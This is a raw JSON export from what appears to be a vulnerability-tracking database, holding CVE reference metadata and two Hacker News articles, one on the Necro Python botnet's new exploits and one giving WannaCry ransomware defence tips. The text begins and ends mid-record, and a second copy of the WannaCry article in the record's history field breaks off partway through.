"5c497684e7b982e9f41e89081d72ea17"}, {"key": "href", "hash": "c32f9a5d9de00e1a1587ad7b40285fd0"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "403ed403becfd91e34c7d282e2a3b12f"}, {"key": "title", "hash": "23ade5ff03698910f687eabbc702a4a8"}, {"key": "type", "hash": "fcc790c72a86190de1b549d0ddc6f55c"}], "hash": "ea0d7d7d5484cccead344e59f84d63cd6d995f8aa84f81c51738fc1fa53bb9e8", "viewCount": 992, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-07-28T14:33:11", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-28T14:33:11", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "thn": [{"id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "hash": "8df263a3af7e3cb4e5c145e7ae7a31c1", "type": "thn", "bulletinFamily": "info", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "description": "[](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\n[](<https://go.thn.li/1-728-5> \"password auditor\" )\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\n[](<https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s0/hacking-malware.jpg>)\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. \"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-06-03T17:01:00", "modified": "2021-06-03T17:01:42", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "immutableFields": [], "lastseen": "2021-06-03T18:34:22", "history": [], "viewCount": 255, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-21972", "CVE-2017-0145", "CVE-2017-0144"]}, {"type": "githubexploit", "idList": ["6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "D4220876-A611-59AE-8262-07797542DAB9", "50618611-3CA9-5185-8ED3-53532D99D4B7", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "64EF6553-4D22-526B-A1CC-09212DBD7625", "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "39EADA2B-CE50-555B-910E-D3B77640C464", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "626E6774-0ACC-594C-BB61-E89F8F034B11"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198", "CPAI-2021-0106"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:50056", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:49602"]}, {"type": "zdt", "idList": ["1337DAY-ID-36472", "1337DAY-ID-35912", "1337DAY-ID-35863", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-35879", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:161527", "PACKETSTORM:154690", "PACKETSTORM:163268", "PACKETSTORM:161590", "PACKETSTORM:156196", "PACKETSTORM:161695", "PACKETSTORM:142602", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-06-03T18:34:22", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-06-03T18:34:22", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"], "cvss2": {}, "cvss3": {}}, {"id": "THN:18A54BDD63D7DC2B3284D326E6510150", "type": "thn", "bulletinFamily": "info", "title": "WannaCry Ransomware: Everything You Need To Know Immediately", "description": "[](<https://1.bp.blogspot.com/-9RR9oKGt5SE/WRnQ-ABMDaI/AAAAAAAAsqQ/t9fGmbmEYCo9PSqPRMGa9F-t8Y_76iOywCLcB/s1600-e20/how-to-wannacry-ransomware.png>)\n\nBy now I am sure you have already heard something about the [WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>), and are wondering what's going on, who is doing this, and whether your computer is secure from this insanely fast-spreading threat that has already hacked nearly 200,000 Windows PCs over the weekend. \n \nThe only positive thing about this attack is that \u2014 you are here \u2014 as after reading this easy-to-understandable awareness article, you would be so cautious that you can save yourself from WannaCry, as well as other similar cyber attacks in the future. \n \n**Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). \n \nSince this widely spread ransomware attack is neither the first nor the last one to hit users worldwide, prevention is always the key to protect against such malware threats. \n \n\n\n[What is WannaCry? How to Protect your Computer from WannaCry Ransomware? Follow These Simple Steps.](<https://www.blogger.com/What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>) \n\n\n[ TWEET THIS __](<https://twitter.com/intent/tweet?text=What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>)\n\n \nIn this article, we have provided some of the most important primary security tips that you should always follow and advised to share with everyone you care for. \n \n\n\n### What is Ransomware &amp; Why WannaCry is More Dangerous?\n\n_(A simple video demonstrating of WannaCry Ransomware, showing how fast it spreads from system-to-system without any user Interaction)_ \n \nFor those unaware, Ransomware is a computer virus that usually spreads via spam emails and malicious download links; specially designed to lock up the files on a computer, until the victim pays the ransom demand, usually $300-$500 in Bitcoins. \n \nBut what makes WannaCry so unique and nasty is its ability to self-spread without even need to click any link or a file. \n \nThe WannaCry ransomware, also known as Wanna Decryptor, leverages a Windows SMB exploit, dubbed **[EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>)**, that allows a remote hacker to hijack computers running on unpatched Microsoft Windows operating system. \n \nOnce infected, WannaCry also scans for other unpatched PCs connected to the same local network, as well as scans random hosts on the wider Internet, to spread itself quickly. \n \n\n\n### What Has Happened So Far\n\n[](<https://1.bp.blogspot.com/--CRkMyWv77U/WRnSBzGBFOI/AAAAAAAAsqU/glEj-9EvHH4XNiyp08QdFAMRkDetWMOpQCLcB/s1600-e20/wannacry-ransomware-cyber-attack.png>)\n\nWe have been covering this story since Friday when this malware was first emerged and hit several hospitals across the globe, eventually forcing them to shut down their entire IT systems over the weekend, hence rejecting patients appointments, and cancel operations. \n \nLater this cyber attack brought down many organizations to their knees. \n \nInstead of repeating same details again, read our previous articles dig deeper and know what has happened so far: \n \n\n\n * **[Day 1: OutCry](<https://thehackernews.com/2017/05/wannacry-ransomware-unlock.html>) **\u2014 WannaCry targeted over 90,000 computers in 99 countries.\n * **[Day 2: The Patch Day](<https://thehackernews.com/2017/05/wannacry-ransomware-windows.html>) **\u2014 A security researcher successfully found a way to slow down the infection rate, and meanwhile, Microsoft releases emergency patch updates for unsupported versions of Windows.\n * **[Day 3: New Variants Arrives](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>) **\u2014 Just yesterday, some new variants of WannaCry, with and without a kill-switch, were detected in the wild would be difficult to stop for at least next few weeks.\n \n\n\n### Isn\u2019t the Cyber Attack Over?\n\n \nAbsolutely not. \n \nThis is just beginning. As I reported yesterday, security researchers have detected some new versions of this ransomware, dubbed **[WannaCry 2.0](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>)**, which couldn\u2019t be stopped by the kill switch. \n \nWhat's even worse is that the new WannaCry variant believed to be created by someone else, and not the hackers behind the first WannaCry ransomware. \n \nIt has been speculated that now other organized cybercriminal gangs, as well as script-kiddies can get motivated by this incident to create and spread similar malicious ransomware. \n \n\n\n### How to Protect Yourself from WannaCry Ransomware?\n\n \nHere are some simple tips you should always follow because most computer viruses make their ways into your systems due to lack of simple security practices: \n \n\n\n#### 1\\. Always Install Security Updates\n\nIf you are using any version of Windows, except Windows 10, with SMB protocol enabled, make sure your computer should always receive updates automatically from the Microsoft, and it\u2019s up-to-date always. \n\n\n#### \n2\\. Patch SMB Vulnerability\n\nSince WannaCry has been exploiting a critical [SMB remote code execution vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) (CVE-2017-0148) for which Microsoft has already released a patch ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in the month of March, you are advised to ensure your system has installed those patches. \n \nMoreover, Microsoft has been very generous to its users in this difficult time that the company has even released the SMB patches ([download from here](<https://support.microsoft.com/en-in/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>)) for its unsupported versions of Windows as well, including Windows XP, Vista, 8, Server 2003 and 2008. \n \n**Note:** If you are using Windows 10 Creators Update (1703), you are not vulnerable to SMB vulnerability. \n \n\n\n#### 3\\. Disable SMB\n\nEven if you have installed the patches, you are advised to disable Server Message Block version 1 (SMBv1) protocol, which is enabled by default on Windows, to prevent against WannaCry ransomware attacks. \n \nHere's the list of simple steps you can follow to disable SMBv1: \n\n\n 1. Go to Windows' Control Panel and open 'Programs.'\n 2. Open 'Features' under Programs and click 'Turn Windows Features on and off.'\n 3. Now, scroll down to find 'SMB 1.0/CIFS File Sharing Support' and uncheck it.\n 4. Then click OK, close the control Panel and restart the computer.\n\n \n\n\n#### 4\\. Enable Firewall &amp; Block SMB Ports\n\nAlways keep your firewall enabled, and if you need to keep SMBv1 enabled, then just modify your firewall configurations to block access to SMB ports over the Internet. The protocol operates on TCP ports 137, 139, and 445, and over UDP ports 137 and 138. \n \n\n\n#### 5\\. Use an Antivirus Program\n\nAn evergreen solution to prevent against most threats is to use a good antivirus software from a reputable vendor and always keep it up-to-date. \n \nAlmost all antivirus vendors have already added detection capability to block WannaCry, as well as to prevent the secret installations from malicious applications in the background. \n \n\n\n#### 6\\. Be Suspicious of Emails, Websites, and Apps\n\nUnlike WannaCry, most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs. \n \nSo, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source to safeguard against such ransomware infection. \n \nAlso, never download any app from third-party sources, and read reviews even before installing apps from official stores. \n \n\n\n#### 7\\. Regular Backup your Files:\n\nTo always have a tight grip on all your important documents and files, keep a good backup routine in place that makes their copies to an external storage device which is not always connected to your computer. \n \nThat way, if any ransomware infects you, it can not encrypt your backups. \n \n\n\n#### 8\\. Keep Your Knowledge Up-to-Date\n\nThere's not a single day that goes without any report on cyber attacks and vulnerabilities in popular software and services, such as Android, iOS, Windows, Linux and Mac Computers as well. \n \nSo, it\u2019s high time for users of any domain to follow day-to-day happening of the cyber world, which would not only help them to keep their knowledge up-to-date, but also prevent against even sophisticated cyber attacks. \n \n\n\n### What to do if WannaCry infects you?\n\n \nWell, nothing. \n \nIf WannaCry ransomware has infected you, you can\u2019t decrypt your files until you pay a ransom money to the hackers and get a secret key to unlock your file. \n \n\n\n#### Never Pay the Ransom:\n\nIt\u2019s up to the affected organizations and individuals to decide whether or not to pay the ransom, depending upon the importance of their files locked by the ransomware. \n \nBut before making any final decision, just keep in mind: there's no guarantee that even after paying the ransom, you would regain control of your files. \n \nMoreover, paying ransom also encourages cyber criminals to come up with similar threats and extort money from the larger audience. \n \nSo, sure shot advice to all users is \u2014 Don't Pay the Ransom. \n \n\n\n### Who's Behind WannaCry &amp; Why Would Someone Do This?\n\n \n**Update: Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). \n \nWhile it's still not known who is behind WannaCry, such large-scale cyber attacks are often propagated by nation states, but this ongoing attack does not bear any link to foreign governments. \n\n\n> \"The recent attack is at an unprecedented level and will require a complex international investigation to identify the culprits,\" said Europol, Europe's police agency.\n\nWhy are they hijacking hundreds of thousands of computers around the globe? Simple \u2014 to extort money by blackmailing infected users. \n\n\n[](<https://1.bp.blogspot.com/-cFyPrIlC1x0/WRnkPC28dKI/AAAAAAAAsqg/k_DozZeVaicpcMfeG57WG0CPgLlUcnvDwCLcB/s1600-e20/bitcoin.png>)\n\nBy looking at the infection rate, it seems like the criminals responsible for this absurd attack would have made lots and lots of dollars so far, but surprisingly they have made relatively little in the way of profits, according to [@actual_ransom](<https://twitter.com/actual_ransom>), a Twitter account that\u2019s tweeting details of every single transaction. \n \nAt the time of writing, the WannaCry attackers have received 171 payments totaling 27.96968763 BTC ($47,510.71 USD). \n \n\n\n### Who is responsible for WannaCry Attack?\n\n \n\u2014 Is it Microsoft who created an operating system with so many vulnerabilities? \n \n\u2014 Or is it the NSA, the intelligence agency of the United States, who found this critical SMB vulnerability and indirectly, facilitates WannaCry like attacks by not disclosing it to Microsoft? \n \n\u2014 Or is it the Shadow Brokers, the hacking group, who managed to hack the NSA servers, but instead of reporting it to Microsoft, they decided to dump hacking tools and zero-day exploits in public? \n \n\u2014 Or is it the Windows users themselves, who did not install the patches on their systems or are still using an unsupported version of Windows? \n \nI do not know who can be blamed for this attack, but according to me, all of them shares equal responsibility. \n \n\n\n### Microsoft Blames NSA/CIA for WannaCry Cyber Attack\n\n \nMicrosoft has hit out at the US government for facilitating cyber attacks, like WannaCry, by not disclosing the software vulnerabilities to the respective vendors and holding them for their benefits, like global cyber espionage. \n \nIn a blog post on Sunday, Microsoft President Brad Smith [condemned](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>) the US intelligence agencies\u2019 unethical practices, saying that the \"widespread damage\" caused by WannaCry happened due to the NSA, CIA and other intelligence agencies for holding zero-days and allowing them to be stolen by hackers. \n\n\n> \"This is an emerging pattern in 2017. We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world,\" Smith said.\n\nThis statement also publicly confirms that the hacking tools and exploits leaked by the Shadow Brokers belong to Equation Group, an elite group of hackers from NSA. \n\n\n> \"Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,\" Smith wrote.\n\nThank you. Stay tuned.\n", "published": "2017-05-15T05:11:00", "modified": "2018-03-15T19:48:57", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0148"], "lastseen": "2018-03-15T23:37:17", "history": [{"lastseen": "2018-01-27T10:06:40", "bulletin": {"id": "THN:18A54BDD63D7DC2B3284D326E6510150", "type": "thn", "bulletinFamily": "info", "title": "WannaCry Ransomware: Everything You Need To Know Immediately", "description": "[](<https://4.bp.blogspot.com/-9RR9oKGt5SE/WRnQ-ABMDaI/AAAAAAAAsqQ/t9fGmbmEYCo9PSqPRMGa9F-t8Y_76iOywCLcB/s1600/how-to-wannacry-ransomware.png>)\n\nBy now I am sure you have already heard something about the [WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-ransomware-cyber-attack.html>), and are wondering what's going on, who is doing this, and whether your computer is secure from this insanely fast-spreading threat that has already hacked nearly 200,000 Windows PCs over the weekend. \n \nThe only positive thing about this attack is that \u2014 you are here \u2014 as after reading this easy-to-understandable awareness article, you would be so cautious that you can save yourself from WannaCry, as well as other similar cyber attacks in the future. \n \n**Also Read \u2014** [Google Researcher Finds Link Between WannaCry Attacks and North Korea](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>). \n \nSince this widely spread ransomware attack is neither the first nor the last one to hit users worldwide, prevention is always the key to protect against such malware threats. \n \n\n\n[What is WannaCry? How to Protect your Computer from WannaCry Ransomware? Follow These Simple Steps.](<https://www.blogger.com/What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>) \n\n\n[ TWEET THIS __](<https://twitter.com/intent/tweet?text=What+is+%23WannaCry%3F+How+to+Protect+your+Computer+from+WannaCry+%23Ransomware%3F+Follow+These+Simple+Steps+http%3A%2F%2Fthehackernews.com%2F2017%2F05%2Fhow-to-wannacry-ransomware.html+%40TheHackersNews>)\n\n \nIn this article, we have provided some of the most important primary security tips that you should always follow and advised to share with everyone you care for. \n \n\n\n### What is Ransomware &amp; Why WannaCry is More Dangerous?\n\n_(A simple video demonstrating of WannaCry Ransomware, showing how fast it spreads from system-to-system without any user Interaction)_ \n \nFor those unaware, Ransomware is a computer virus that usually spreads via spam emails and malicious download links; specially designed to lock up the files on a computer, until the victim pays the ransom demand, usually $300-$500 in Bitcoins. \n \nBut what makes WannaCry so unique and nasty is its ability to self-spread without even need to click any link or a file. \n \nThe WannaCry ransomware, also known as Wanna Decryptor, leverages a Windows SMB exploit, dubbed **[EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>)**, that allows a remote hacker to hijack computers running on unpatched Microsoft Windows operating system. \n \nOnce infected, WannaCry also scans for other unpatched PCs connected to the same local network, as well as scans random hosts on the wider Internet, to spread itself quickly. \n \n\n\n### What Has Happened So 